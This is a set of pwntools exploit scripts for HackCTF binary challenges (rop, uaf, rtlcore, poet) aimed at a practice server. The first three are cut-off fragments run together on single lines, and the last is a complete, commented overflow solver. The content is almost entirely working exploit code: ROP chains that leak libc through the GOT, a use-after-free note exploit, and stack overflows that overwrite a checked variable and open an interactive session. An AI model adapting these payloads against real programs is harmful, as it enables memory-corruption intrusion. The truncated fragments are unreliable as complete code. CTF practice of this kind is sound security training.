from pwn import * #p = process('./rop') p = remote('ctf.j0n9hyun.xyz', 3018) e = ELF('./rop') #lib = e.libc lib = ELF("libc.so.6") context.log_level = "debug" ppp_r = 0x08048509 main = 0x08048470 payload = 'a' * 0x88 + 'b' * 4 payload += p32(e.plt['write']) + p32(ppp_r) + p32(1) + p32(e.got['write']) + p32(4) payload += p32(main) p.sendline(payload) libc = u32(p.recv(4)) - lib.sym['write'] log.i..
from pwn import * #p = process('./uaf') p = remote('ctf.j0n9hyun.xyz', 3021) context.log_level="debug" def add_note(size, content): p.recv() p.sendline('1') p.recv() p.sendline(size) p.recv() p.sendline(content) def del_note(index): p.recv() p.sendline('2') p.recv() p.sendline(index) def p_note(index): p.recv() p.sendline('3') p.recv() p.sendline(index) magic = 0x08048986 add_note('100','') add_..
from pwn import * #p = process('./rtlcore') p = remote('ctf.j0n9hyun.xyz', 3011) e = ELF('./rtlcore') #lib = e.libc lib = ELF('./libc.so.6') context.log_level="debug" p.recv() payload = p32(0xC0D9B0A7) + '\x00' * 50 p.sendline(payload) p.recvuntil('\xa1\x9c\x20') libc = int(p.recv(10), 16) - lib.sym['printf'] p.recv() pause() log.info('libc : ' + hex(libc)) payload = 'a' * (0x3e + 4) payload += ..
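"""HackCTF 'poet' solver (pwntools).

Overflow the 0x40-byte input buffer so the 8 bytes that follow it become
exactly 1000000, the value the binary apparently checks before giving the
reward.  The program resets that value after the first input is read, so
the same payload has to be sent a second time for the check to see it.
"""
from pwn import *

#p = process('./poet')
p = remote('ctf.j0n9hyun.xyz', 3014)
context.log_level = "debug"

# Address of the reward routine; kept for reference only, this solve does
# not redirect control flow.
reward = 0x00000000004007E6

# Value the overflow must land in the variable placed after the buffer.
TARGET_SCORE = 1000000
# Distance from the start of the input buffer to that variable
# (taken from the original exploit; confirm against the disassembly).
BUF_OFFSET = 0x40

# Must be bytes: p64() returns bytes, and str + bytes raises TypeError
# under Python 3 pwntools.
payload = b'a' * BUF_OFFSET + p64(TARGET_SCORE)

p.recv()
p.sendline(payload)
p.recv()
pause()  # debugging breakpoint: attach a debugger before the second send
# The value is cleared after the first read, so it has to be written again.
p.sendline(payload)
p.interactive()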